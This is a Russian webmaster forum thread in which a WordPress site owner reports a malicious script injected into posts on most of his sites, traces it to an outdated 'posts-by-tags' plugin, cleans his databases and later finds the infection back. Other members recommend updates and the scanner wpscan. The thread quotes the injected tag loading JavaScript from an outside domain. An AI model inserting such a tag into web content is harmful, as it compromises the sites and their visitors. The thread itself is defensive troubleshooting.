Спрашиваем и отвечаем по Wordpress-9

solomko
На сайте с 01.09.2007
Offline
213
#311

Привет всем.

На большинстве моих сайтов с движком ВП, примерно 90%, появился вот этот вот скрипт

<script type="text/javascript" src="//wq4.ru/js.js"></script>
.... В записях, рандомно (не во всех).

Погуглил в сети, на многих сайтах он так же появился недавно, особенно часто он "впихивается" как текст в формы для кода.... Похоже, что это новая атака на движок ВП.

Как побороть эту гадость, никто не сталкивался? Откуда оно грузится?

30% всех моих доходов идут отсюда (http://www.sape.ru/r.d5e628f4c4.php) Когда-то тут была ссылка рефки Рrofit-partner - R.I.P милый друг Поднимаю показатели сайтов, стабильный доход (http://gogetlinks.net/?inv=gypp40)
SeVlad
На сайте с 03.11.2008
Offline
1609
#312
solomko:
Похоже, что это новая атака на движок ВП

Похоже на тему/плагин с помойки/устаревшую/уязвимую. :)

solomko:
Как побороть эту гадость,

Использовать свежие версии всего. Защищать сайт. Читать соседний раздел и закреплённый там топик.

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Связь со мной через http://wp.me/P3YHjQ-3.
solomko
На сайте с 01.09.2007
Offline
213
#313
SeVlad:
Похоже на тему/плагин с помойки/устаревшую/уязвимую.

Может быть, просто, в сети уйма других сайтов, у которых этот код появился начиная с 16 мая... Поэтому я и думаю, что это новая атака на ВП. А вот возраст и причины уязвимости мне неизвестны.

Вдруг кому-то пригодится как бороться\убрать код "<script type="text/javascript" src="//wq4.ru/js.js"></script>"

Внимание! В БД он отображается как: "<script type="text/javascript" src="//wq4.ru/js.js"></script>"

Я не особо большой специалист, но установил, что вирус этот пишется в базы данных. На хостере было пару моих БД, все разные и с разными именами\паролями. Видимо где-то хостер подкачал, что стали известны пароли или я какой-то плагин не обновил.

Вирус имел название PHP:BackDoor-BX [Trj]

Что я сделал:

1) скачал БД, нашел в них код этого вируса (увы, но только код который "вставляется").

2) Параллельно нашелся файл в котором был этот вирус - это был options.php файлик в кешпапке... Хостер вирус не обнаружил, файл был обнаружен ативирусом на компьютере.

3) После замены\удаления кода в БД, я сменил пароли ко всем БД и их имена.

4) Залил очищенные базы данных.

Может, кому-то эта информация поможет.

Shelton724
На сайте с 26.05.2011
Offline
263
#314

malquem, поиск по тексту через тотал коммандер поможет, сам так адаптировал шаблон на английском языке под наши реалии

eiweb
На сайте с 08.11.2014
Offline
82
#315
solomko:

Я не особо большой специалист, но установил, что вирус этот пишется в базы данных. На хостере было пару моих БД, все разные и с разными именами\паролями. Видимо где-то хостер подкачал, что стали известны пароли или я какой-то плагин не обновил.

Хостер здесь явно не причем!!!

Проверьте свой сайт с помощью "wpscan" возможно много интересного про свой сайт узнаете.

Например Ваш логин от админ панели, а вот сбрутить пароль если получится, тогда уже в сторону хостера головой кивать.

VPS сервер (https://hosteiweb.com) в Европе и США - от €3.43 /мес. (базовое администрирование)
solomko
На сайте с 01.09.2007
Offline
213
#316
eiweb:
Проверьте свой сайт с помощью "wpscan" возможно много интересного про свой сайт узнаете.
Например Ваш логин от админ панели, а вот сбрутить пароль если получится, тогда уже в сторону хостера головой кивать.

Спасибо, беда в том, что у меня их пачка... Где прорыв не ясно.

totamon
На сайте с 12.05.2007
Offline
437
#317

Konceptovskiy, обиженный по жизни?

solomko, связались с WP, беспокойтесь о безопасности, подпишитесь на /ru/forum/899258

и если хотите конкретики, пишите конкретные данные, какие плагины установлены хотя бы, шелл на сайт может разными путями попасть, от вируса на компьютере и украденного доступа фтп, до уязвимости на соседнем аккаунте хостинга, но самое распространенное все-таки уязвимость в ваших скриптах.

solomko:
Может быть, просто, в сети уйма других сайтов, у которых этот код появился начиная с 16 мая... Поэтому я и думаю, что это новая атака на ВП.

просто на сотнях сайтов используются

SeVlad:
тему/плагин с помойки/устаревшую/уязвимую

и SeVlad тут прав, "с 16 мая" это уже не новая атака... это "старая" атака. а то что ей месяц уже говорит об отношении вебмастеров к своим сайтам🍿

Домены и хостинг https://8fn.ru/regru | Дедик от 3000р https://8fn.ru/73 | VPS в Москве https://8fn.ru/72 | Лучшие ВПС, ТП огонь, все страны! https://8fn.ru/inferno | ХОСТИНГ №1 РОССИИ https://8fn.ru/beget
eiweb
На сайте с 08.11.2014
Offline
82
#318
solomko:
Спасибо, беда в том, что у меня их пачка... Где прорыв не ясно.

Я же написал проверьте "wpscan" в Kali linux он уже установлен. Запустите и он покажет где брешь.

Вообще WP только на первый взгляд кажется простой и не сложной CMS.

WP, CMS очень капризная и требует постоянного внимания. 1 месяц не уделил должного внимания - держи "леща" 😂

solomko
На сайте с 01.09.2007
Offline
213
#319

totamon, спасибо подпишусь.

Да, виноват, сам понимаю, что нужно было обновлять плагины и все остальное. Вирус нашло в плагине под названием "posts-by-tags". Это был очень старый плагин, который я просто не удалял. Время создания папки было 2014 год, июнь. А обновлялась папка 16 мая.

Сложно следить за пачкой сайтов, особенно если пару из них "замороженные" проекты.

---------- Добавлено 04.07.2015 в 23:20 ----------

eiweb, спасибо.

solomko
На сайте с 01.09.2007
Offline
213
#320

Вирус вернулся.

Можно каким-то плагином проверить кто и ЧТО пишет в базу данных?

---------- Добавлено 05.07.2015 в 12:30 ----------

Есть какие-то плагины, которые мониторят кто и что пишет в определенный table базы данных?

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий